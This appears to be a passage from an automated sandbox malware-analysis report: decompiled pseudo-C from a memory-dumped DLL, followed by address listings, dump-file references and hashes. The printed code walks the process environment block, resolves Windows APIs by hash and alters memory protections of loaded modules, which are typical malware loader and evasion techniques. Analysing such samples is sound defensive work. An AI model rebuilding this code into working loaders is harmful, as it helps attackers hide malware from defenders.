												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6E2E35F4(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6E2E1C54(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6E2DDFF8(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6E2DDFF8(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x82fffbdc;
									if(_t535[0x54] == 0x82fffbdc) {
										 *0x6e2ed20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0xdb278333;
										if(_t535[0x54] == 0xdb278333) {
											 *0x6e2ed210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6E2DE8D4( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6E2E3044(0xfe338407, 0xccbfc9a9, 0xfe338407, 0xfe338407);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6e2ed2e4 = 1;
					E6E2DF5A8( &(_t535[0x38]), 0);
					E6E2DF5A8( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6E2DF4E0( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6E2E3044(0xfe338407, 0x790529cb, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6E2DF84C( &(_t535[0xc]), E6E2DF4F0( &(_t535[8])) + 0x14);
								_t369 = E6E2DF4E0( &(_t535[0xc]), E6E2DF4F0( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6E2DF678( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6E2DF5A8( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6E2DF678( &(_t535[8]));
							E6E2DF678( &(_t535[0x164]));
							E6E2DF5A8( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6E2DF5A8( &(_t535[0x20]), 0);
							_push(0xfe338407);
							_t289 = E6E2E1D58(0xfe338407);
							_t290 = E6E2E1310( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6E2E1C90( &(_t535[0x164]), 0xfe338407);
							_t518 =  &(_t535[0x178]);
							E6E2DD058( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6E2E5CAC( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6E2E5CE0( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6E2E8DE0( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6E2DF678( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6E2DBB88( &(_t535[0x110]));
							}
							E6E2DD020( &(_t535[0x104]));
							E6E2DD020(_t518);
							E6E2DD020( &(_t535[0x15c]));
							E6E2DD020( &(_t535[0x154]));
							E6E2E90C4( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6E2DF63C( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6E2E9088( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6E2DF4E0( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6E2DF4F0( &(_t535[0x44]));
								_t519 =  *(0x6e2ebd40 + _t381 * 4);
								_t531 = E6E2E9054( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6E2E87C0( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6E2DF4F0( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6E2DF500( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6E2DF4F0( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6E2DF84C( &(_t535[0x20]), E6E2DF4F0( &(_t535[0x1c])) + 8);
										E6E2DF4E0( &(_t535[0x20]), E6E2DF4F0( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6E2E3154(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6E2DF84C( &(_t535[0x48]), _t535[0x70]);
									E6E2E3154(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6E2DF864( &(_t535[0x44]), _t563);
									E6E2DF864( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6E2E9114( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6E2E90DC( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6E2DF678( &(_t535[0x144]));
									E6E2DF678( &(_t535[0x134]));
									goto L38;
								}
								 *0x6e2ed2e8 =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6E2DF678( &(_t535[0x11c]));
							E6E2E8E40(_t381,  &(_t535[0xd8]));
							E6E2DF678( &(_t535[0x1c]));
							E6E2DF678( &(_t535[0x44]));
							E6E2DF678( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6E2DF4E0( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6E2DF84C( &(_t535[0x38]), E6E2DF4F0( &(_t535[0x34])) + 0x14);
							_t347 = E6E2DF4E0( &(_t535[0x38]), E6E2DF4F0( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6E2DF4E0( &(_t535[0xc]), _t62);
						_t455 = E6E2DF4E0( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6e2e146c
0x6e2e1473
0x6e2e1476
0x6e2e147d
0x6e2e1bff
0x6e2e1bff
0x6e2e1483
0x6e2e148e
0x6e2e19cd
0x6e2e19d1
0x00000000
0x6e2e1c50
0x6e2e19d7
0x6e2e19da
0x6e2e19dd
0x6e2e19e7
0x6e2e19f6
0x6e2e19f8
0x6e2e19ff
0x6e2e1be9
0x6e2e1beb
0x6e2e1bee
0x6e2e1bf2
0x00000000
0x6e2e1bf2
0x6e2e1a0e
0x6e2e1a19
0x6e2e1a20
0x6e2e1a23
0x6e2e1a25
0x6e2e1a28
0x6e2e1a2b
0x6e2e1a31
0x6e2e1a3f
0x6e2e1a4f
0x6e2e1a74
0x6e2e1a85
0x6e2e1a88
0x6e2e1a8a
0x6e2e1aee
0x6e2e1af1
0x6e2e1af1
0x6e2e1af3
0x6e2e1af6
0x6e2e1afa
0x6e2e1afa
0x6e2e1afe
0x00000000
0x00000000
0x6e2e1b0b
0x6e2e1b11
0x6e2e1b45
0x6e2e1b4b
0x6e2e1b4d
0x6e2e1c1c
0x6e2e1c24
0x6e2e1c27
0x6e2e1c29
0x6e2e1c40
0x6e2e1c40
0x6e2e1c2b
0x6e2e1c2f
0x6e2e1c34
0x6e2e1c34
0x6e2e1c42
0x6e2e1c48
0x6e2e1b67
0x6e2e1b67
0x6e2e1b69
0x6e2e1b69
0x6e2e1b6b
0x6e2e1b6b
0x6e2e1b70
0x00000000
0x00000000
0x6e2e1b72
0x6e2e1b73
0x6e2e1b76
0x6e2e1b79
0x00000000
0x00000000
0x6e2e1b85
0x6e2e1b88
0x6e2e1b8a
0x6e2e1ba1
0x6e2e1ba1
0x6e2e1b8c
0x6e2e1b90
0x6e2e1b95
0x6e2e1b95
0x6e2e1bae
0x6e2e1bb1
0x6e2e1bba
0x6e2e1bbd
0x6e2e1be0
0x6e2e1be4
0x00000000
0x6e2e1be4
0x6e2e1bc5
0x6e2e1bc5
0x6e2e1bd1
0x6e2e1bd4
0x6e2e1bdd
0x00000000
0x6e2e1bdd
0x6e2e1b53
0x6e2e1b63
0x6e2e1b63
0x6e2e1b65
0x00000000
0x00000000
0x6e2e1b5b
0x6e2e1b5d
0x6e2e1b5d
0x00000000
0x6e2e1b63
0x6e2e1b13
0x6e2e1b1b
0x6e2e1b3b
0x6e2e1b1d
0x6e2e1b1d
0x6e2e1b25
0x6e2e1b2e
0x6e2e1b2e
0x6e2e1b25
0x00000000
0x6e2e1b1b
0x6e2e1a8c
0x6e2e1a93
0x00000000
0x00000000
0x6e2e1aa0
0x6e2e1aa6
0x6e2e1aab
0x6e2e1ab2
0x6e2e1ab6
0x6e2e1acb
0x6e2e1acd
0x6e2e1acf
0x6e2e1ad5
0x6e2e1ae3
0x6e2e1ae3
0x6e2e1ae9
0x00000000
0x6e2e1ae9
0x00000000
0x00000000
0x00000000
0x00000000
0x6e2e1a33
0x6e2e1a33
0x6e2e1a33
0x6e2e1a34
0x6e2e1a37
0x6e2e1a3b
0x00000000
0x6e2e1a51
0x6e2e1a54
0x6e2e1a57
0x6e2e1a60
0x6e2e1a63
0x6e2e1a64
0x6e2e1a66
0x00000000
0x6e2e14a1
0x6e2e14a3
0x6e2e14a8
0x6e2e14b3
0x6e2e14c1
0x6e2e14d4
0x6e2e14e1
0x6e2e14ea
0x6e2e14ee
0x6e2e14f2
0x6e2e153a
0x6e2e153a
0x6e2e153c
0x6e2e1543
0x00000000
0x00000000
0x6e2e155c
0x6e2e1564
0x6e2e1568
0x6e2e157d
0x6e2e1581
0x6e2e1585
0x6e2e158e
0x6e2e1594
0x6e2e1597
0x6e2e159b
0x6e2e15a3
0x6e2e15a5
0x6e2e15a9
0x6e2e15b0
0x6e2e15b9
0x6e2e15b9
0x6e2e15bd
0x6e2e15d2
0x6e2e15e8
0x6e2e15f5
0x6e2e15f6
0x6e2e15f6
0x6e2e15f8
0x00000000
0x00000000
0x00000000
0x00000000
0x6e2e15b2
0x6e2e15b2
0x6e2e15b2
0x6e2e15b3
0x6e2e15b4
0x00000000
0x6e2e15b2
0x6e2e1577
0x6e2e157b
0x00000000
0x00000000
0x00000000
0x6e2e15fc
0x6e2e15fc
0x6e2e15fd
0x6e2e1600
0x6e2e160a
0x6e2e160a
0x6e2e160e
0x6e2e1615
0x6e2e1670
0x6e2e1675
0x6e2e16c8
0x6e2e16c8
0x6e2e16cc
0x6e2e16d0
0x6e2e14fa
0x6e2e14fd
0x6e2e1502
0x6e2e1508
0x6e2e150b
0x6e2e1512
0x6e2e1516
0x6e2e151d
0x6e2e1526
0x6e2e152a
0x6e2e152e
0x6e2e1534
0x00000000
0x00000000
0x00000000
0x6e2e1534
0x6e2e16da
0x6e2e16e6
0x6e2e16f1
0x6e2e16f8
0x6e2e1701
0x6e2e170b
0x6e2e170c
0x6e2e171a
0x6e2e171f
0x6e2e1720
0x6e2e172d
0x6e2e1732
0x6e2e1744
0x6e2e1749
0x6e2e174e
0x6e2e1760
0x6e2e1772
0x6e2e1777
0x6e2e1782
0x6e2e1789
0x6e2e178e
0x6e2e1796
0x6e2e179f
0x6e2e179f
0x6e2e17ab
0x6e2e17b2
0x6e2e17be
0x6e2e17ca
0x6e2e17d8
0x6e2e17e9
0x6e2e17f0
0x6e2e17f5
0x6e2e17fe
0x6e2e1803
0x6e2e1805
0x6e2e1809
0x6e2e180d
0x6e2e181a
0x6e2e1827
0x6e2e182b
0x6e2e183f
0x6e2e1843
0x00000000
0x00000000
0x6e2e1858
0x6e2e185a
0x6e2e1862
0x6e2e185f
0x6e2e185f
0x6e2e185f
0x6e2e1866
0x6e2e1868
0x6e2e186e
0x6e2e1874
0x6e2e18d0
0x6e2e18d9
0x6e2e18dd
0x6e2e18ea
0x6e2e18f3
0x6e2e18f8
0x6e2e18fc
0x6e2e18ff
0x6e2e1960
0x6e2e1976
0x6e2e1981
0x6e2e1982
0x6e2e1983
0x6e2e1987
0x6e2e198a
0x6e2e1c0a
0x6e2e1c0d
0x6e2e1c0d
0x00000000
0x6e2e198a
0x6e2e1909
0x6e2e1919
0x6e2e1922
0x6e2e192b
0x6e2e1934
0x6e2e1935
0x6e2e1936
0x6e2e193b
0x6e2e1943
0x6e2e194b
0x00000000
0x00000000
0x00000000
0x6e2e194d
0x6e2e187d
0x6e2e1882
0x6e2e1886
0x6e2e1886
0x6e2e188a
0x6e2e188d
0x00000000
0x00000000
0x6e2e18ae
0x6e2e18b0
0x6e2e18b4
0x6e2e18b6
0x00000000
0x00000000
0x6e2e18b8
0x6e2e18bf
0x6e2e18cb
0x00000000
0x6e2e18cb
0x6e2e1892
0x00000000
0x6e2e1990
0x6e2e1990
0x6e2e1991
0x6e2e19a1
0x6e2e19ad
0x6e2e19b6
0x6e2e19bf
0x6e2e19c8
0x00000000
0x6e2e19c8
0x6e2e1677
0x6e2e1679
0x6e2e167b
0x6e2e1680
0x6e2e1685
0x6e2e1698
0x6e2e16ae
0x6e2e16b7
0x6e2e16b8
0x6e2e16b8
0x6e2e16ba
0x6e2e16bb
0x6e2e16be
0x6e2e16c2
0x00000000
0x6e2e167b
0x6e2e1617
0x6e2e1621
0x6e2e1622
0x6e2e1622
0x6e2e162f
0x6e2e163b
0x6e2e163d
0x6e2e163f
0x6e2e1643
0x6e2e1653
0x6e2e1653
0x6e2e165a
0x6e2e165d
0x6e2e165e
0x6e2e1662
0x6e2e166c
0x00000000
0x6e2e166c

Memory Dump Source

Source File: 00000003.00000002.428086465.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true

Associated: 00000003.00000002.428073469.000000006E2D0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.428112325.000000006E2EA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.428123241.000000006E2ED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.428131857.000000006E2EF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82cfb93a836626d1ddc7d6cc1bf8d733599262d870e36e12447a620d1e7da78f
Instruction ID: f94118c49bf370f564050af01b5d0a01a4e1dfe808123c723d775d14ff41f9b8
Opcode Fuzzy Hash: 82cfb93a836626d1ddc7d6cc1bf8d733599262d870e36e12447a620d1e7da78f
Instruction Fuzzy Hash: 7132BF341083598FD710DFA8C890AEFB7E6BF84304F508D2CE595876A1EB30E989CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E2E1D58, Relevance: .3, Instructions: 282
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E6E2E1D58(intOrPtr __eax) {
				void* _t72;
				intOrPtr _t74;
				signed int _t75;
				signed int _t76;
				signed char _t84;
				signed char _t86;
				signed char _t89;
				signed char _t92;
				signed char _t95;
				signed char* _t99;
				void* _t113;
				signed char _t114;
				signed char _t116;
				signed char _t118;
				intOrPtr _t119;
				signed char _t120;
				signed char _t127;
				signed char _t129;
				signed char _t130;
				signed char _t143;
				signed char _t145;
				signed char _t146;
				signed int _t147;
				signed char _t148;
				void* _t151;
				signed char _t155;
				signed char _t159;
				signed char _t165;
				signed char _t166;
				signed char _t167;
				signed char _t168;
				void* _t170;
				void* _t171;
				intOrPtr _t172;
				signed char _t173;
				intOrPtr _t174;
				intOrPtr* _t175;
				signed char _t176;
				signed char _t177;
				signed char _t178;
				signed char _t179;
				signed char* _t181;

				_t119 = __eax;
				_t143 =  *0x6e2ed21c; // 0x0
				if(_t143 == 0x76470dcb) {
					_t143 = 0;
					 *0x6e2ed21c = 0;
				}
				if(_t119 != 0xfe338407) {
					L4:
					_t174 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
					if(_t119 != 0xa7e21d79) {
						while(1) {
							L10:
							__eflags = _t143;
							if(_t143 == 0) {
								break;
							}
							_t72 = 0;
							_t120 = 0;
							__eflags = 0;
							while(1) {
								__eflags = _t119 -  *((intOrPtr*)(_t120 + _t143 + 8));
								if(_t119 ==  *((intOrPtr*)(_t120 + _t143 + 8))) {
									break;
								}
								_t72 = _t72 + 1;
								_t120 = _t120 + 0x10;
								__eflags = _t72 - 0x10;
								if(_t72 < 0x10) {
									continue;
								}
								_t143 =  *(_t143 + 0x100);
								goto L10;
							}
							return  *((intOrPtr*)(_t120 + _t143 + 0xc));
						}
						__eflags = _t119 - 0x94e21d79;
						if(_t119 != 0x94e21d79) {
							_t74 =  *((intOrPtr*)(_t174 + 0xc));
							_t175 =  *((intOrPtr*)(_t74 + 0xc));
							_t181[4] =  *(_t74 + 0x10);
							while(1) {
								_t172 =  *((intOrPtr*)(_t175 + 0x30));
								_t75 = 0;
								__eflags = 0;
								while(1) {
									_t145 =  *(_t172 + _t75 * 2) & 0x0000ffff;
									_t181[0x1c + _t75 * 2] = _t145;
									__eflags = _t145;
									_t146 =  *(_t175 + 0x2c) & 0x0000ffff;
									if(_t145 == 0) {
										break;
									}
									_t75 = _t75 + 1;
									__eflags = _t75 - _t146;
									if(_t75 <= _t146) {
										continue;
									}
									break;
								}
								__eflags = _t146;
								_t147 = 0;
								if(_t146 <= 0) {
									L34:
									_t76 = E6E2E4FD4( &(_t181[0x13c]), _t147);
									__eflags = _t119 - (_t76 ^ 0x7af3da47);
									if(_t119 == (_t76 ^ 0x7af3da47)) {
										_t173 =  *(_t175 + 0x18);
										__eflags = _t173;
										if(_t173 == 0) {
											L55:
											return _t173;
										}
										L38:
										_t148 =  *0x6e2ed2ec; // 0x1
										__eflags = _t148 |  *0x6e2ed2ed;
										if((_t148 |  *0x6e2ed2ed) == 0) {
											_t176 =  *0x6e2ed21c; // 0x0
											__eflags = _t176;
											if(_t176 == 0) {
												 *0x6e2ed2ec = 1;
												_t177 = E6E2E35F4(0x104);
												__eflags = _t177;
												if(_t177 == 0) {
													_t177 = 0;
													__eflags = 0;
													L62:
													 *0x6e2ed21c = _t177;
													 *0x6e2ed214 = E6E2E3044(0xfe338407, 0xb0386671, 0xfe338407, 0xfe338407);
													 *0x6e2ed2ec = 0;
													L45:
													_t151 = 0;
													_t165 = 0;
													__eflags = 0;
													while(1) {
														__eflags =  *(_t165 + _t177 + 8);
														if( *(_t165 + _t177 + 8) == 0) {
															break;
														}
														_t151 = _t151 + 1;
														_t165 = _t165 + 0x10;
														__eflags = _t151 - 0x10;
														if(_t151 < 0x10) {
															continue;
														}
														_t84 = E6E2E35F4(0x104);
														_t181[4] = _t84;
														__eflags =  *_t181;
														if( *_t181 == 0) {
															 *_t181 = 0;
															L53:
															 *( *_t181 + 0xc) = _t173;
															E6E2DD03C( *_t181,  &(_t181[0x1c]));
															_t155 =  *_t181;
															 *((intOrPtr*)(_t155 + 8)) = _t119;
															 *(_t177 + 0x100) = _t155;
															goto L55;
														}
														_t167 = _t84;
														_t86 = 0x10;
														do {
															_t181[0x13c] = _t86;
															E6E2DCFC8(_t167, 0);
															 *((intOrPtr*)(_t167 + 8)) = 0;
															 *((intOrPtr*)(_t167 + 0xc)) = 0;
															_t167 = _t167 + 0x10;
															_t86 = _t181[0x138] - 1;
															__eflags = _t86;
														} while (_t86 != 0);
														 *( *_t181 + 0x100) = 0;
														goto L53;
													}
													_t166 = _t165 + _t177;
													__eflags = _t166;
													 *(_t166 + 0xc) = _t173;
													E6E2DD03C(_t166,  &(_t181[0x1c]));
													 *((intOrPtr*)(_t166 + 8)) = _t119;
													goto L55;
												}
												_t168 = _t177;
												_t89 = 0x10;
												do {
													_t181[4] = _t89;
													E6E2DCFC8(_t168, 0);
													 *((intOrPtr*)(_t168 + 8)) = 0;
													 *((intOrPtr*)(_t168 + 0xc)) = 0;
													_t168 = _t168 + 0x10;
													_t89 =  *_t181 - 1;
													__eflags = _t89;
												} while (_t89 != 0);
												 *(_t177 + 0x100) = 0;
												goto L62;
											}
											_t159 =  *(_t176 + 0x100);
											while(1) {
												__eflags = _t159;
												if(_t159 == 0) {
													goto L45;
												}
												_t177 = _t159;
												_t159 =  *(_t159 + 0x100);
											}
											goto L45;
										}
										__eflags = _t119 - 0xfe338407;
										if(_t119 == 0xfe338407) {
											 *0x6e2ed220 = _t173;
										}
										goto L55;
									}
									__eflags = _t175 - _t181[4];
									if(_t175 != _t181[4]) {
										_t175 =  *_t175;
										continue;
									}
									L36:
									_t173 = 0;
									goto L55;
								}
								_t92 = 0;
								__eflags = 0;
								while(1) {
									_t126 =  *((char*)(_t172 + _t147 * 2));
									 *_t181 = _t92;
									_t39 = _t126 - 0x41; // -81
									__eflags = _t39 - 0x19;
									_t40 = _t126 + 0x20; // 0x10
									_t127 =  <=  ? _t40 :  *((char*)(_t172 + _t147 * 2));
									_t181[_t147 + 0x13c] = _t127;
									_t95 =  *_t181;
									__eflags = _t127;
									if(_t127 == 0) {
										goto L34;
									}
									_t92 = _t95 + 1;
									_t147 = _t147 + 1;
									__eflags = _t92 - ( *(_t175 + 0x2c) & 0x0000ffff);
									if(_t92 < ( *(_t175 + 0x2c) & 0x0000ffff)) {
										continue;
									}
									goto L34;
								}
								goto L34;
							}
						}
						_t170 = E6E2E9A00();
						_t178 = 0;
						while(1) {
							_t129 = E6E2E3044(0xfe338407, 0x790529cb, 0xfe338407, 0xfe338407);
							__eflags = _t129;
							if(_t129 == 0) {
								goto L16;
							}
							_t116 =  *_t129(0xffffffff, _t178, 0,  &(_t181[0x11c]), 0x1c, 0);
							__eflags = _t116;
							if(_t116 != 0) {
								goto L36;
							}
							L16:
							_t99 =  &(_t181[0x120]);
							_t173 =  *_t99;
							_t130 = _t99[8];
							__eflags = _t173 - _t170;
							if(_t173 > _t170) {
								L13:
								_t178 = _t178 + _t130;
								__eflags = _t178;
								continue;
							}
							__eflags = _t130 + _t173 - _t170;
							if(_t130 + _t173 <= _t170) {
								goto L13;
							}
							__eflags = _t173;
							if(_t173 == 0) {
								goto L55;
							}
							E6E2DF5A8( &(_t181[0x10]), 0x400);
							_t171 = E6E2DF4E0( &(_t181[0x10]), 0);
							_t179 = E6E2E3044(0xfe338407, 0x790529cb, 0xfe338407, 0xfe338407);
							__eflags = _t179;
							if(_t179 == 0) {
								L21:
								E6E2DD000( &(_t181[0xc]),  *((intOrPtr*)(_t171 + 4)), 0);
								__eflags = E6E2DD210( &(_t181[8]), 0x5c);
								if(__eflags != 0) {
									_push(0x5c);
									E6E2DD650( &(_t181[0xc]), __eflags,  &(_t181[0x1bc]));
									E6E2DD03C( &(_t181[8]), _t181[0x1bc]);
									E6E2DD020( &(_t181[0x1bc]));
								}
								E6E2DDE70( &(_t181[0x20]), _t181[4], 0);
								E6E2DD020( &(_t181[4]));
								L24:
								E6E2DF678( &(_t181[0xc]));
								goto L38;
							}
							 *_t181 = E6E2DF4E0( &(_t181[0x10]), 0);
							_t113 = E6E2DF4F0( &(_t181[0xc]));
							_t114 =  *_t179(0xffffffff, _t173, 2, _t181[8], _t113, 0);
							__eflags = _t114;
							if(_t114 != 0) {
								goto L24;
							}
							goto L21;
						}
					}
					return  *((intOrPtr*)(_t174 + 8));
				} else {
					_t118 =  *0x6e2ed220; // 0x77df0000
					if(_t118 != 0xe86b6198) {
						return _t118;
					}
					goto L4;
				}
			}

0x6e2e1d62
0x6e2e1d64
0x6e2e1d70
0x6e2e1d72
0x6e2e1d74
0x6e2e1d74
0x6e2e1d80
0x6e2e1d92
0x6e2e1d98
0x6e2e1da1
0x6e2e1dc8
0x6e2e1dc8
0x6e2e1dc8
0x6e2e1dca
0x00000000
0x00000000
0x6e2e1dab
0x6e2e1dad
0x6e2e1dad
0x6e2e1daf
0x6e2e1daf
0x6e2e1db3
0x00000000
0x00000000
0x6e2e1db9
0x6e2e1dba
0x6e2e1dbd
0x6e2e1dc0
0x00000000
0x00000000
0x6e2e1dc2
0x00000000
0x6e2e1dc2
0x00000000
0x6e2e20f1
0x6e2e1dcc
0x6e2e1dd2
0x6e2e1efe
0x6e2e1f04
0x6e2e1f07
0x6e2e1f10
0x6e2e1f10
0x6e2e1f13
0x6e2e1f13
0x6e2e1f15
0x6e2e1f15
0x6e2e1f19
0x6e2e1f1e
0x6e2e1f20
0x6e2e1f24
0x00000000
0x00000000
0x6e2e1f26
0x6e2e1f27
0x6e2e1f29
0x00000000
0x00000000
0x00000000
0x6e2e1f29
0x6e2e1f2b
0x6e2e1f2f
0x6e2e1f30
0x6e2e1f62
0x6e2e1f69
0x6e2e1f73
0x6e2e1f75
0x6e2e1f84
0x6e2e1f87
0x6e2e1f89
0x6e2e2071
0x00000000
0x6e2e2071
0x6e2e1f8f
0x6e2e1f8f
0x6e2e1f95
0x6e2e1f9b
